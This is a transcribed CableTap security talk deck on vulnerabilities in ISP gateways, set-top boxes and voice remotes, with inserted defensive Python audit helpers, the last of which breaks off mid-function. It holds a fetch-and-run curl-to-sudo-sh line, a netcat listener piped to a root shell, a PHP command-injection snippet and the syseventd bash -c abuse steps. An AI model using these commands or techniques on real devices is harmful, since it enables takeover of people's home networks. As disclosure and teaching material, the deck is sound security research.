CableTap
Wirelessly Tapping Your Home Network
MARC NEWLIN
@MARCNEWLIN
LOGAN LAMB
LOGAN@BASTILLE.IO
CHRIS GRAYSON
@_LAVALAMP
WELCOME TO THE
LINECON AFTER-PARTY.
MARC NEWLIN (@marcnewlin)
WIRELESS SECURITY RESEARCHER @ BASTILLE NETWORKS
CHRISTOPHER GRAYSON (@_lavalamp)
FOUNDER / PRINCIPAL ENGINEER @ WEB SIGHT
LOGAN LAMB (logan@bastille.io)
RESEARCHER @ BASTILLE NETWORKS
What is CableTap?
• 26 CVEs
• ISP-provided wireless gateways, set-top boxes, and voice remotes
• Cisco, Arris, Technicolor, Motorola, Xfinity (voice remote)
• Multiple unauthenticated RCE attack chains
• Network / application vulnerabilities
• Wi-Fi vulnerabilities
• ZigBee RF4CE vulnerabilities
Why does CableTap matter?
• Full compromise of affected devices
• Wide impact
• ISP vulnerabilities
• Vendor vulnerabilities
• RDK vulnerabilities (software stack used by many major ISPs)
• Attack chains affecting Comcast XFINITY devices have been patched
AGENDA
1. Background on RDK
2. RDK-based devices
3. Progression of research
4. Vulnerabilities
5. Disclosure process
6. Q&A
Background
on RDK.
REFERENCE DEVELOPMENT KIT (RDK)
• “a standardized software stack with localization plugins created to accelerate the deployment of next-gen video products and services by multichannel video providers (MVPDs).”
• Founded in 2012
• Standardized software stack for modems, set top boxes, media devices
https://rdkcentral.com/
C
YAY OPEN SOURCE (?) SOFTWARE!
An open-source, community-driven project available at: https://code.rdkcentral.com/
But wait what’s this WHOIS record?
Ohhhh that sinking feeling in the pit of my stomach…
YEAH BUT WHO NEEDS PATCHES ANYHOO
• There’s the open source version, then there are the versions deployed on devices
• Lots of vulns patched in the open source repo
• Patches take months to deploy, no CVEs filed, no disclosure to affected customers
• Still faster to deploy patches with RDK than non-standardized “native” stacks
• RCE, XSS, XSRF, you name it they got it
RDK-Based
Devices
L
RDK DEVICES
● RDK-V (Video)
○ set-top boxes
● RDK-B (Broadband)
○ gateways
GENERAL RDK FEATURES
Remote Management Subsystem
Diagnostics
Security Subsystem
Media Framework
• Embedded Linux
• Lots of IO
• AV/Ethernet/Coax/USB/eSata
• Media Framework uses Webkit
• Supports keyboard and mouse
• More pictures: https://fccid.io/ACQ-XG1
RDK-BROADBAND (GATEWAY)
[Diagram: Gateway = Router (Application Processor) + Modem (Network Processor)]
RDK-BROADBAND
• Two systems on one board
• Inter-processor communication over a switch
• Intel Puma
• Network Processor - ARM core
• Application Processor - Intel Atom
• Generally has two serial ports active
Annotated dpc3939 internals here
Progression of
Research
M
MARC LEARNS TO NETCAT
Project inspiration (Peter Geissler’s talk @ HITB)
Connecting with Chris
Prior Comcast customer (Marc’s ISP)
“Beyond your cable modem” 32C3 talk
“How do I webapp security plz?”
Pulling off the filesystem using the previously disclosed web UI ping vuln
Digging into the RDK repos
M
GETTING SERIOUS
Finding some vulns and getting serious
Bringing the side project to Bastille
Bringing Logan into the fold
Hardware and embedded hacking expertise
Expanding to set-top boxes
Disclosing to vendors as new vulnerabilities are found
M
Vulnerabilities
M
VULNS - HIDDEN HOME SECURITY WIFI
Home security service offered by many ISPs
Touchscreen control panel connects over WiFi
Hidden WiFi network runs on the customer’s gateway
SSID and passphrase generated based on the CM MAC
Hidden WiFi network, previously documented online
Web UI access point index “hack”
XHS-XXXXXXXX SSID format, based on CM MAC
Grepping around for “calculate” “generate” “key” “psk” etc
M
VULNS - HIDDEN HOME SECURITY WIFI
CalculatePSKKey in <some binary>
Cross compiling for big-endian ARM and running a keygen binary on the gateway
Guesswork yielding the CM MAC input and PSK key output
Command line binary observed on some devices
How to get the CM MAC??
M
VULNS - DHCP ACK CM MAC LEAK
1. Connect to “xfinitywifi” network
2. CM MAC of the wireless gateway is included in the DHCP ACK
3. Generate hidden home security network SSID and passphrase
M
VULNS - IPV6 MULTICAST CM MAC LEAK
1. Sniff the 802.11 channel used by the target wireless gateway
2. Every ~4 seconds, a 156-byte IPv6 multicast packet is transmitted with the l2sd0.500 interface MAC address
3. Translate the l2sd0.500 MAC to the CM MAC
4. Generate hidden home security network SSID and passphrase
11:22:33:44:55:66 - l2sd0.500
0F:22:33:44:55:63 - CM MAC
M
VULNS - eMTA FQDN CM MAC LEAK
1. mta0 (VoIP) interface has FQDN containing the mta0 MAC
2. Translate the mta0 MAC into the CM MAC
3. Generate hidden home security network SSID and passphrase
FQDN: m001122334455.atlt6.ga.comcast.net
CM MAC: 00:11:22:33:44:53 <-- last octet decreased by 2
VULNS - IPV6 ADDRESSING FROM CM MACS
Global IPv6
Link-local IPv6
Given the following inputs:
Region identifier: 40:11 (Atlanta)
Unknown octet: 53 (can be brute forced)
MAC address: 11:22:33:44:55:66
The following wan0 IPv6 address is generated:
2001:0558:4011:0053:1122:33FF:FE44:5566
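Added example (not from the slides or the CableTap repo): an audit helper that checks whether an IPv6 address carries a MAC in its interface identifier, as the wan0 address above does. The slide's address keeps the first MAC octet unchanged, while standard modified EUI-64 (RFC 4291) flips the 0x02 bit, so both candidates are returned; the function names and all sample addresses other than the slide's are constructed.

```python
import ipaddress

FFFE = b"\xff\xfe"  # filler inserted between the two MAC halves

# Constructed inventory: the slide's example plus two made-up addresses.
SAMPLE_ADDRESSES = [
    "2001:0558:4011:0053:1122:33FF:FE44:5566",  # from the slide
    "fe80::1322:33ff:fe44:5566",                # constructed, link-local
    "2001:db8:0:1:8d2f:41c7:9a03:5be1",         # constructed, random-looking IID
]


def format_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def embedded_mac(addr: str):
    """Return MAC candidates embedded in the interface ID, or None.

    The low 64 bits are treated as hardware-derived when bytes 3-4 are
    ff:fe. Two readings are returned because the slide's address does not
    flip the universal/local bit while standard modified EUI-64 does.
    """
    iid = ipaddress.IPv6Address(addr).packed[8:]
    if iid[3:5] != FFFE:
        return None
    mac = iid[:3] + iid[5:]
    return {
        "as_written": format_mac(mac),
        "ul_bit_flipped": format_mac(bytes([mac[0] ^ 0x02]) + mac[1:]),
    }


def audit(addresses):
    """List every address whose interface ID discloses a MAC address."""
    findings = []
    for text in addresses:
        macs = embedded_mac(text)
        if macs is None:
            continue
        ip = ipaddress.IPv6Address(text)
        findings.append({
            "address": ip.compressed,
            "scope": "link-local" if ip.is_link_local else "non-link-local",
            # First four groups: on the slide these are the fixed prefix,
            # the region identifier and the "unknown octet".
            "prefix_groups": ip.exploded.split(":")[:4],
            **macs,
        })
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_ADDRESSES):
        print(finding)
```

Any address this flags is derivable by anyone who learns the device MAC, which is why the MAC leaks on the preceding slides matter for remote reachability.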
M
COMCAST VS PUBLIC INTERNET DEVICE ACCESS
Web UI supports MSO login from WAN only
SSH service from WAN only
Internet-facing network configuration appears well locked-down
M
XFINITY SEND-TO-TV
Xfinity customer signs in with their account credentials
Web app accepts URL
Set-top box displays URL in a web browser
M
VULNS - XFINITY SEND-TO-TV / REMOTE WEB UI
Gateway web UI accepts remote requests from Comcast infrastructure
MSO login using the POTD
Alternative hard-coded credentials
IPv6 address of target gateway provides remote web UI access via set-top box
Vulns - POTD
“Password of the day” can be generated on a wireless gateway
Used for remote web UI authentication
Used for remote SSH authentication
M
VULNS - FREE INTERNET
• Public wifi access points run by ISPs
• e.g. “CableWiFi”, “xfinitywifi”, etc
• AP’s are on customer equipment or ISP equipment
• Customer logs into their ISP account to get access
M
• MAC address is remembered for future access
• Attacker can spoof the MAC
• Free Internet on other public access points
• “xfinitywifi” usage does not count toward a customer’s
M
SEND-TO-TV ATTACK
DEMO
IT’S LIKE CGI, BUT FAST & W/ EXPLOITS
• FastCGI – successor to the Common Gateway Interface (CGI) protocol
• Authored in 1996
• Enables web servers to invoke other processes – birth of dynamic generation of web content
• No RFC, only documentation from MIT .edu site
• Responder, Authorizer, and Filter modes of operation
C
PHP FASTCGI PROCESS MANAGER (PHP-FPM)
• PHP + FastCGI – what could possibly go wrong?!
• Lets you reconfigure PHP settings on every request
• HTTP POST data supplied via STDIN FastCGI parameter
• If only there were abusable PHP configuration values…
PIECING THINGS TOGETHER
• We can…
• Reconfigure the PHP interpreter to include an arbitrary file
• Supply data to STDIN via HTTP POST
• But how do we include STDIN?
• PHP TO THE RESCUE!
• php://stdin
ISN’T THIS OLD NEWS?
• Yes… Kind of (CVE-2012-1823)
• Previous work was on exploiting the PHP-CGI binary residing within a web directory
• But what if the PHP-CGI binary is bound to a network port?
• Nmap sees as tcpwrapped (TCP 1026-1029)
• Scripts for detection included in CableTap code repo
37,449 PHPFPM servers on port 1026 (IPv4 address space)
C
A TWIST IN RDK’S PHPFPM
• PHPFPM on the RDK deployments we tested had the PHP configuration component stripped out
• No publicly-available documentation as to how to do this – why was it removed?
• Could still gain code execution by referencing PHP files on the system and bypassing control flow guards in the default web app
C
SYSEVENTD – RCE AS A SERVICE (RAAS)
• Binary protocol listener on TCP 52,367 (all interfaces)
• Not the same as Oracle syseventd!
• Intended for firing off commands based on system events (logging??)
• No auth, no nothing!
C
SYSEVENTD USAGE
1. Create an event with a name and a binary to call upon event occurrence (name must be a file path)
2. Trigger the event by touching the event name file path and providing an argument
3. Binary is called with event name and arguments passed to command via execv
$ sysevent --port 52367 --ip 172.16.12.1 async </path/to/file> /bin/cp
$ sysevent --port 52367 --ip 172.16.12.1 set </path/to/file> /var/IGD/<file>
$ /bin/cp </path/to/file> /var/IGD/<file>
C
SYSEVENTD (AB)USAGE
/bin/cp /foo/bbhm_cur_cfg.xml /bar/baz/bbhm_cur_cfg.xml
/bin/bash -c "<commands to execute>"
• Create an event with a target process of /bin/bash and an event name of -c
• Trigger the event with a value of the bash command to run
• ???
• Profit
C
WHERE THE SYSEVENTD AT?!
• Bound to all interfaces
• Sometimes not firewalled off from public-facing IP address
• Otherwise exposed to plenty of the LAN IPs
149,162 Syseventd services on TCP 52,367 (IPv4 address space)
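Added example (not from the slides or the CableTap repo): a defender-side check for the exposure described on the PHP-FPM and syseventd slides, flagging listeners on TCP 1026-1029 or 52367 that are not bound to loopback. It assumes Linux `ss -ltn` text as input; the sample output and function names are constructed.

```python
import ipaddress

# Ports named on the slides. A port match is only a hint: confirm the
# owning process (e.g. with `ss -ltnp`) before acting on a finding.
WATCHED_PORTS = {52367: "syseventd"}
WATCHED_PORTS.update({port: "php-fpm" for port in range(1026, 1030)})

# Constructed sample of `ss -ltn` output.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      128          0.0.0.0:52367      0.0.0.0:*
LISTEN 0      128        127.0.0.1:1026       0.0.0.0:*
LISTEN 0      128             [::]:1027          [::]:*
LISTEN 0      128    10.0.0.1%brlan0:1028     0.0.0.0:*
LISTEN 0      128          0.0.0.0:80         0.0.0.0:*
"""


def parse_listeners(ss_output: str):
    """Yield (bind_host, port) for every LISTEN row of `ss -ltn` output."""
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue  # header or unrelated row
        host, _, port = fields[3].rpartition(":")
        if not port.isdigit():
            continue
        # Drop an interface scope such as "%brlan0" before classifying.
        yield host.split("%", 1)[0], int(port)


def classify(host: str) -> str:
    """Classify a bind address as all-interfaces, loopback or single-interface."""
    bare = host.strip("[]")
    if bare in ("0.0.0.0", "::", "*"):
        return "all-interfaces"
    try:
        if ipaddress.ip_address(bare).is_loopback:
            return "loopback"
    except ValueError:
        pass  # unparseable host: treat as a specific interface
    return "single-interface"


def audit_listeners(ss_output: str):
    """Return watched-port listeners reachable from beyond the local host."""
    findings = []
    for host, port in parse_listeners(ss_output):
        service = WATCHED_PORTS.get(port)
        if service is None:
            continue
        exposure = classify(host)
        if exposure != "loopback":
            findings.append({
                "port": port,
                "expected_service": service,
                "bind": host,
                "exposure": exposure,
            })
    return findings


if __name__ == "__main__":
    for finding in audit_listeners(SAMPLE_SS):
        print(finding)
```

A wildcard bind still needs a firewall review per interface, since the slide notes the service was only sometimes filtered on the public-facing address.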
C
A TALE OF TWO OPERATING SYSTEMS
• Two operating systems on the board
• One ARM (modem w/ web app) and one Atom (router)
• Modem is at bottom of range (10.0.0.1) and Atom is at top of range (10.0.0.254)
C
I MAKE MY OWN ROUTES DAMMIT
• Atom OS has an interface allocated in 169.254.0.0/16 range for Dbus
• …You can route to it if you’re into that sort of thing
• Custom RPC service that is quite literally RCE as a service, and all that FastCGI goodness
• Once on Atom side, hardcoded root SSH creds to ARM side on 192.168.0.0/16
ip route add 169.254.0.1 via 10.0.0.254
C
SET-TOP BOX VULNS
Remote web inspector
Arbitrary file read
Root command execution
RF4CE remote force pairing
RF4CE remote force OTA
L
REMOTE WEB INSPECTOR
Comparable to Firefox and Chrome DevTools, accessible from over the internet
L
ARBITRARY FILE READ
● Found a route that looked like it was for reading files from the filesystem
● The route is for reading files from the filesystem
L
ROOT COMMAND EXECUTION
Sanitize your inputs!!!
Sanitize your inputs!!!
Sanitize your inputs!!!
sudo make install
curl http://totallylegit.com | sudo sh
nc -l -p 8080 0.0.0.0 | sudo sh
<?php
$name = $_POST["name"];
shell_exec("echo hello $name");
?>
VOICE REMOTE OVERVIEW
Control your STB with your voice!
Wireless instead of IR!
Motion activated lights!
TI CC2530 with RF4CE stack
RF4CE OVERVIEW
Zigbee protocol for remote control
Key exchange is unencrypted
RF4CE MSO (OPENCABLE) OVERVIEW
Uses RF4CE
For remote control of cable equipment
Binding process is not rate limited
RF4CE REMOTE FORCED PAIRING
Emulate remote
Entire binding process in under one second
~2 hours to force pair remote
L
RF4CE REMOTE FORCED OTA
Firmware package ISN’T signed
1) Modify update daemon
2) Modify firmware payload
3) Fix CRC and version
4) OTA :)
L
Devices
& Disclosure
M
KNOWN AFFECTED DEVICES
Vendor | Model | Type | Tested ISP | CVE Count
Cisco | DPC3939 | Wireless Gateway | Xfinity | 16
Cisco | DPC3939B | Wireless Gateway | Comcast Business | 13
Technicolor | DPC3941T | Wireless Gateway | Xfinity | 11
Arris | TG1682G | Wireless Gateway | Xfinity | 12
Technicolor | TC8717T* | Wireless Gateway | Time Warner | 1
Motorola | MX011ANM | Set-Top Box | Xfinity | 6
Xfinity | XR11-20 | ZigBee Voice Remote | Xfinity | 1
M
KNOWN NON-RDK DEVICES
Vendor | Model | Type | Tested ISP
Arris | TG1682G | Wireless Gateway | Spectrum
Technicolor | TC8717T | Wireless Gateway | Mediacom
Technicolor | TC8717T | Wireless Gateway | Time Warner
Arris | TG2492LG-VM | Wireless Gateway (Super Hub 3.0) | Virgin Media
Compal | CH7465LG-LC | Wireless Gateway (Connect Box) | Unitymedia
Technicolor | TC8305C | Wireless Gateway | Xfinity
Arris | TG1682G | Wireless Gateway | Cox
M
DISCLOSURE TIMELINE
03/27/2017 Group 1 Vendor Disclosures
03/28/2017 Group 2 Vendor Disclosures
04/20/2017 Group 3 Vendor Disclosures
04/28/2017 Group 4 Vendor Disclosures
07/11/2017 Abstract goes live on defcon.org
07/28/2018 Public Disclosure (all groups)
M
REMEDIATION AND MITIGATION
Unauthenticated RCE attack chains affecting Comcast XFINITY devices have been remediated
Customers of other ISPs should contact their ISP to determine if their hardware is affected by CableTap
M
FINAL REMARKS
Not enough time to talk about all of the vulnerabilities
Please see our whitepaper for further details <link to whitepaper>
We found a substantial number of vulns, but the most severe have been patched (hooray!)
M
Q&A
Thank you for watching our talk :)
Thanks to Bastille for supporting our research.
Thanks to Comcast for remediating the unauthenticated RCE attack chains affecting Xfinity-branded devices.
MARC NEWLIN
Bastille Networks
marc@bastille.io
@marcnewlin
LOGAN LAMB
Bastille Networks
logan@bastille.io
CHRIS GRAYSON
Web Sight
chris@websight.io
@_lavalamp

CableTap - Wirelessly Tapping Your Home Network

  • 1. Cabletap Wirelessly Tapping your home network MARC NEWLIN @MARCNEWLI N LOGAN LAMB LOGAN@BASTILLE .IO CHRIS GRAYSON @_LAVALAMP
  • 2. WELCOME TO THE LINECON AFTER-PARTY.
  • 3. MARC NEWLIN (@marcnewlin)W I R E L E S S S E C U R I T Y R E S E A R C H E R @ B A S T I L L E N E T W O R K S
  • 4. CHRISTOPHER GRAYSON (@_lavalamp)F O U N D E R / P R I N C I P A L E N G I N E E R @ W E B S I G H T
  • 5. LOGAN LAMB (logan@bastille.io) R E S E A R C H E R @ B A S T I L L E N E T W O R K S
  • 6. • 26 CVEs • ISP-provided wireless gateways, set-top boxes, and voice remotes • Cisco, Arris, Technicolor, Motorola, Xfinity (voice remote) • Multiple unauthenticated RCE attack chains • Network / application vulnerabilities • Wi-Fi vulnerabilities • ZigBee RF4CE vulnerabilities What is CableTap?
  • 7. • Full compromise of affected devices • Wide impact • ISP vulnerabilities • Vendor vulnerabilities • RDK vulnerabilities (software stack used by many major ISPs) • Attack chains affecting Comcast XFINITY devices have been patched Why does CableTap matter?
  • 8. AGENDA 1. Background on RDK 2. RDK-based devices 3. Progression of research 4. Vulnerabilities 5. Disclosure process 6. Q&A
  • 10. REFERENCE DEVELOPMENT KIT (RDK) • “a standardized software stack with localization plugins created to accelerate the deployment of next-gen video products and services by multichannel video providers (MVPDs).” • Founded in 2012 • Standardized software stack for modems, set top boxes, media devices https://rdkcentral.com/ C
  • 11. YAY OPEN SOURCE (?) SOFTWARE! An open-source, community-driven project available at: https://code.rdkcentral.com/ But wait what’s this WHOIS record? Ohhhh that sinking feeling in the pit of my stomach…
  • 12. YEAH BUT WHO NEEDS PATCHES ANYHOO • There’s the open source version, then there’s the versions deployed on deployed devices • Lots of vulns patched in the open source repo • Patches take months to deploy, no CVEs filed for, no disclosure to affected customers • Still faster to deploy patches with RDK than non-standardized “native” stacks • RCE, XSS, XSRF, you name it they got it
  • 14. RDK DEVICES ● RDK-V (Video) ○ set-top boxes ● RDK-B (Broadband) ○ gateways
  • 15. GENERAL RDK FEATURES Remote Management Subsystem Diagnostics Security Subsystem Media Framework
  • 16. • Embedded Linux • Lots of IO • AV/Ethernet/Coax/USB/eSata • Media Framework uses Webkit • Supports keyboard and mouse • More pictures: https://fccid.io/ACQ-XG1
  • 18. RDK-BROADBAND • Two systems on one board • Inter-processor communication over a switch • Intel Puma • Network Processor - ARM core • Application Processor - Intel Atom • Generally has two serial ports active Annotated dpc3939 internals here
  • 20. MARC LEARNS TO NETCAT Project inspiration (Peter Geissler’s talk @ HITB) Connecting with Chris Prior Comcast customer (Marc’s ISP) “Beyond your cable modem” 32C3 talk “How do I webapp security plz?” Pulling off the filesystem using the previously disclosed web UI ping vuln Digging into the RDK repos M
  • 21. GETTING SERIOUS Finding some vulns and getting serious Bringing the side project to Bastille Bringing Logan into the fold Hardware and embedded hacking expertise Expanding to set-top boxes Disclosing to vendors as new vulnerabilities are found M
  • 23. VULNS - HIDDEN HOME SECURITY WIFI Home security service offered by many ISPs Touchscreen control panel connects over WiFi Hidden WiFi network runs on the customer’s gateway SSID and passphrase generated based on the CM MAC Hidden WiFi network, previously documented online Web UI access point index “hack” XHS-XXXXXXXX SSID format, based on CM MAC Grepping around for “calculate” “generate” “key” “psk” etc M
  • 24. VULNS - HIDDEN HOME SECURITY WIFI CalculatePSKKey in <some binary> Cross compiling for big-endian ARM and running a keygen binary on the gateway Guesswork yielding the CM MAC input and PSK key output Command line binary observed on some devices How to get the CM MAC?? M
  • 25. VULNS - DHCP ACK CM MAC LEAK 1. Connect to “xfinitywifi” network 2. CM MAC of the wireless gateway is included in the DHCP ACK 3. Generate hidden home security network SSID and passphrase M
  • 26. VULNS - IPV6 MULTICAST CM MAC LEAK 1. Sniff the 802.11 channel used by the target wireless gateway 2. Every ~4 seconds, a 156-byte IPv6 multicast packet is transmitted with the l2sd0.500 interface MAC address 3. Translate the l2sd0.500 MAC to the CM MAC 4. Generate hidden home security network SSID and passphrase 11:22:33:44:55:66 - l2sd0.500 0F:22:33:44:55:63 - CM MAC M
  • 27. VULNS - eMTA FQDN CM MAC LEAK 1. mta0 (VoIP) interface has FQDN containing the mta0 MAC 2. Translate the mta0 MAC into the CM MAC 3. Generate hidden home security network SSID and passphrase FQDN: m001122334455.atlt6.ga.comcast.net CM MAC: 00:11:22:33:44:53 <-- last octet decreased by 2
  • 28. VULNS - IPV6 ADDRESSING FROM CM MACS Global IPv6 Link-local IPv6 Given the following inputs: Region identifier: 40:11 (Atlanta) Unknown octet: 53 (can be brute forced) MAC address: 11:22:33:44:55:66 The following wan0 IPv6 address is generated: 2001:0558:4011:0053:1122:33FF:FE44:5566 M
  • 29. COMCAST VS PUBLIC INTERNET DEVICE ACCESS Web UI supports MSO login from WAN only SSH service from WAN only Internet-facing network configuration appears well locked-down M
  • 30. XFINITY SEND-TO-TV Xfinity customer signs in with their account credentials Web app accepts URL Set-top box displays URL in a web browser M
  • 31. VULNS - XFINITY SEND-TO-TV / REMOTE WEB UI Gateway web UI accepts remote requests from Comcast infrastructure MSO login using the POTD Alternative hard-coded credentials IPv6 address of target gateway provides remote web UI access via set-top box
  • 32. Vulns - POTD “Password of the day” can be generated on a wireless gateway Used for remote web UI authentication Used for remote SSH authentication M
  • 33. VULNS - FREE INTERNET • Public wifi access points run by ISPs • e.g. “CableWiFi”, “xfinitywifi”, etc • APs are on customer equipment or ISP equipment • Customer logs into their ISP account to get access M • MAC address is remembered for future access • Attacker can spoof the MAC • Free Internet on other public access points • “xfinitywifi” usage does not count toward a customer’s
  • 35. IT’S LIKE CGI, BUT FAST & W/ EXPLOITS • FastCGI – successor to the Common Gateway Interface (CGI) protocol • Authored in 1996 • Enables web servers to invoke other processes – birth of dynamic generation of web content • No RFC, only documentation from MIT .edu site • Responder, Authorizer, and Filter modes of operation C
  • 36. PHP FASTCGI PROCESS MANAGER (PHP-FPM) • PHP + FastCGI – what could possibly go wrong?! • Lets you reconfigure PHP settings on every request • HTTP POST data supplied via STDIN FastCGI parameter • If only there were abusable PHP configuration values…
  • 37. PIECING THINGS TOGETHER • We can… • Reconfigure the PHP interpreter to include an arbitrary file • Supply data to STDIN via HTTP POST • But how do we include STDIN? • PHP TO THE RESCUE! • php://stdin
  • 38. ISN’T THIS OLD NEWS? • Yes… Kind of (CVE-2012-1823) • Previous work was on exploiting the PHP-CGI binary residing within a web directory • But what if the PHP-CGI binary is bound to a network port? • Nmap sees as tcpwrapped (TCP 1026-1029) • Scripts for detection included in CableTap code repo 37,449 PHPFPM servers on port 1026 (IPv4 address space) C
  • 39. A TWIST IN RDK’S PHPFPM • PHPFPM on the RDK deployments we tested had the PHP configuration component stripped out • No publicly-available documentation as to how to do this – why was it removed? • Could still gain code execution by referencing PHP files on the system and bypassing control flow guards in the default web app C
  • 40. SYSEVENTD – RCE AS A SERVICE (RAAS) • Binary protocol listener on TCP 52,367 (all interfaces) • Not the same as Oracle syseventd! • Intended for firing off commands based on system events (logging??) • No auth, no nothing! C
  • 41. SYSEVENTD USAGE 1. Create an event with a name and a binary to call upon event occurrence (name must be a file path) 2. Trigger the event by touching the event name file path and providing an argument 3. Binary is called with event name and arguments passed to command via execv $ sysevent --port 52367 --ip 172.16.12.1 async </path/to/file> /bin/cp $ sysevent --port 52367 --ip 172.16.12.1 set </path/to/file> /var/IGD/<file> $ /bin/cp </path/to/file> /var/IGD/</file> C
  • 42. SYSEVENTD (AB)USAGE /bin/cp /foo/bbhm_cur_cfg.xml /bar/baz/bbhm_cur_cfg.xml /bin/bash -c "<commands to execute>" • Create an event with a target process of /bin/bash and an event name of -c • Trigger the event with a value of the bash command to run • ??? • Profit C
  • 43. WHERE THE SYSEVENTD AT?! • Bound to all interfaces • Sometimes not firewalled off from public-facing IP address • Otherwise exposed to plenty of the LAN IPs 149,162 Syseventd services on TCP 52,367 (IPv4 address space) C
  • 44. A TALE OF TWO OPERATING SYSTEMS • Two operating systems on the board • One ARM (modem w/ web app) and one Atom (router) • Modem is at bottom of range (10.0.0.1) and Atom is at top of range (10.0.0.254) C
  • 45. I MAKE MY OWN ROUTES DAMMIT • Atom OS has an interface allocated in 169.254.0.0/16 range for Dbus • …You can route to it if you’re into that sort of thing • Custom RPC service that is quite literally RCE as service, and all that FastCGI goodness • Once on Atom side, hardcoded root SSH creds to ARM side on 192.168.0.0/16 ip route add 169.254.0.1 via 10.0.0.254 C
  • 46. SET-TOP BOX VULNS Remote web inspector Arbitrary file read Root command execution RF4CE remote force pairing RF4CE remote force OTA L
  • 47. REMOTE WEB INSPECTOR Comparable to Firefox and Chrome DevTools, accessible from over the internet L
  • 48. ARBITRARY FILE READ ● Found a route that looked like it was for reading files from the filesystem ● The route is for reading files from the filesystem L
  • 49. ROOT COMMAND EXECUTION Sanitize your inputs!!! Sanitize your inputs!!! Sanitize your inputs!!! sudo make install curl http://totallylegit.com | sudo sh nc -l -p 8080 0.0.0.0 | sudo sh <?php $name = $_POST["name"]; shell_exec("echo hello $name"); ?>
  • 50. VOICE REMOTE OVERVIEW Control your STB with your voice! Wireless instead of IR! Motion activated lights! TI CC2530 with RF4CE stack
  • 51. RF4CE OVERVIEW Zigbee protocol for remote control Key exchange is unencrypted
  • 52. RF4CE MSO (OPENCABLE) OVERVIEW Uses RF4CE For remote control of cable equipment Binding process is not rate limited
  • 53. RF4CE REMOTE FORCED PAIRING Emulate remote Entire binding process in under one second ~2 hours to force pair remote L
  • 54. RF4CE REMOTE FORCED OTA Firmware package ISN’T signed 1) Modify update daemon 2) Modify firmware payload 3) Fix CRC and version 4) OTA :) L
  • 56. KNOWN AFFECTED DEVICES
      Vendor | Model | Type | Tested ISP | CVE Count
      Cisco | DPC3939 | Wireless Gateway | Xfinity | 16
      Cisco | DPC3939B | Wireless Gateway | Comcast Business | 13
      Technicolor | DPC3941T | Wireless Gateway | Xfinity | 11
      Arris | TG1682G | Wireless Gateway | Xfinity | 12
      Technicolor | TC8717T* | Wireless Gateway | Time Warner | 1
      Motorola | MX011ANM | Set-Top Box | Xfinity | 6
      Xfinity | XR11-20 | ZigBee Voice Remote | Xfinity | 1
      M
  • 57. KNOWN NON-RDK DEVICES
      Vendor | Model | Type | Tested ISP
      Arris | TG1682G | Wireless Gateway | Spectrum
      Technicolor | TC8717T | Wireless Gateway | Mediacom
      Technicolor | TC8717T | Wireless Gateway | Time Warner
      Arris | TG2492LG-VM | Wireless Gateway (Super Hub 3.0) | Virgin Media
      Compal | CH7465LG-LC | Wireless Gateway (Connect Box) | Unitymedia
      Technicolor | TC8305C | Wireless Gateway | Xfinity
      Arris | TG1682G | Wireless Gateway | Cox
      M
  • 58. DISCLOSURE TIMELINE 03/27/2017 Group 1 Vendor Disclosures 03/28/2017 Group 2 Vendor Disclosures 04/20/2017 Group 3 Vendor Disclosures 04/28/2017 Group 4 Vendor Disclosures 07/11/2017 Abstract goes live on defcon.org 07/28/2018 Public Disclosure (all groups) M
  • 59. REMEDIATION AND MITIGATION Unauthenticated RCE attack chains affecting Comcast XFINITY devices have been remediated Customers of other ISPs should contact their ISP to determine if their hardware is affected by CableTap M
  • 60. FINAL REMARKS Not enough time to talk about all of the vulnerabilities Please see our whitepaper for further details <link to whitepaper> We found a substantial number of vulns, but the most severe have been patched (hooray!) M
  • 61. Q&A Thank you for watching our talk :) Thanks to Bastille for supporting our research. Thanks to Comcast for remediating the unauthenticated RCE attack chains affecting Xfinity-branded devices. MARC NEWLIN Bastille Networks marc@bastille.io @marcnewlin LOGAN LAMB Bastille Networks logan@bastille.io CHRIS GRAYSON Web Sight chris@websight.io @_lavalamp
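
Added example for slide 28 (not code from the talk or the CableTap repository): an audit that flags IPv6 addresses whose interface ID is built from a MAC address, which is what makes the wan0 address on that slide predictable. The function names and the two 2001:db8:: addresses are constructed for illustration; the first address and the MAC are the ones shown on the slide.

```python
import ipaddress

def embedded_mac(addr):
    """Return the MAC readings embedded in addr's interface ID, or None."""
    iid = ipaddress.IPv6Address(addr).packed[8:]   # low 64 bits of the address
    # MAC-derived interface IDs split the MAC and insert FF:FE in the middle.
    # A random ID matches by chance about once in 65536, so treat a hit as a lead.
    if iid[3:5] != b"\xff\xfe":
        return None
    raw = iid[:3] + iid[5:]
    # RFC 4291 modified EUI-64 inverts bit 0x02 of the first octet; the slide's
    # address copies the MAC unchanged. Report both readings.
    flipped = bytes([raw[0] ^ 0x02]) + raw[1:]
    fmt = lambda b: ":".join(f"{x:02X}" for x in b)
    return {"verbatim": fmt(raw), "modified_eui64": fmt(flipped)}

def audit(addresses, known_macs):
    """Return {address: mac} for addresses that expose one of known_macs."""
    known = {m.upper() for m in known_macs}
    findings = {}
    for addr in addresses:
        readings = embedded_mac(addr)
        if readings:
            for mac in readings.values():
                if mac in known:
                    findings[addr] = mac
    return findings

# Constructed inventory: the slide's example plus two documentation-prefix addresses.
SAMPLE_ADDRESSES = [
    "2001:0558:4011:0053:1122:33FF:FE44:5566",  # from slide 28
    "2001:db8::1322:33ff:fe44:5566",            # constructed, modified EUI-64 of the same MAC
    "2001:db8::a1b2:c3d4:e5f6:718",             # constructed, randomized interface ID
]
SAMPLE_MACS = ["11:22:33:44:55:66"]             # MAC from slide 28

if __name__ == "__main__":
    for addr, mac in audit(SAMPLE_ADDRESSES, SAMPLE_MACS).items():
        print(f"{addr} exposes {mac}")
```

Addresses that come back from the audit should move to randomized or otherwise non-MAC-derived interface IDs where the platform allows it.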
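
Added example for slide 54 (not code from the talk or from any device firmware): a CRC only detects accidental corruption, so an update check has to authenticate the image before trusting its CRC and version. The header layout, key and payloads are constructed, and HMAC-SHA256 stands in for a vendor signature because the Python standard library has no asymmetric signing; a real remote should verify an asymmetric signature so that it holds no signing secret.

```python
import hashlib
import hmac
import struct
import zlib

HEADER = struct.Struct(">II")   # constructed layout: version, CRC32 of payload

def build_image(version, payload):
    """Anyone can produce a header that passes the CRC check; no secret is involved."""
    return HEADER.pack(version, zlib.crc32(payload)) + payload

def crc_ok(image):
    """Integrity check only: catches accidental corruption in transit."""
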